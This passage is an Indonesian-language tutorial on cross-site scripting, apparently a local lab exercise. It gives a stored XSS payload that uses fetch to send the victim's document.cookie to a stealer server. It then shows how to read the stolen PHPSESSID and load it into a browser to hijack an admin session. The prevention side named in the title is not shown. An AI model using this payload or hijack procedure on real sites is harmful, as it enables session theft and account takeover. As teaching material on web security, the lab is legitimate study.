Mengungkap Bahaya Cross-Site Scripting(XSS):Eksperimen dan Cara Mencegahnya

<script>
fetch("http://localhost:1337/steal?c=" + document.cookie)
</script>

Submit komentar sebagai attacker.

c. Akses view_comments.php 

Admin membuka halaman komentar → skrip dijalankan → cookie dikirim ke stealer.js. 

Lihat Cookie Dicuri

Cek isi file stolen_cookies.txt(otomatis terbuat) di folder stealer_server/:

Stolen cookie: PHPSESSID=abc123456xyz

Gunakan Cookie untuk Bajak Sesi

• Buka browser baru/incognito.

• Masuk ke login.php

• Tekan F12 → buka tab Application → pilih Cookies → edit:

Nama: PHPSESSID

Nilai: (isi dari stolen cookie)

• Akses http://localhost/xss_advanced/dashboard.php

Jika sesi PHPSESSID valid, kamu akan melihat halaman dashboard admin!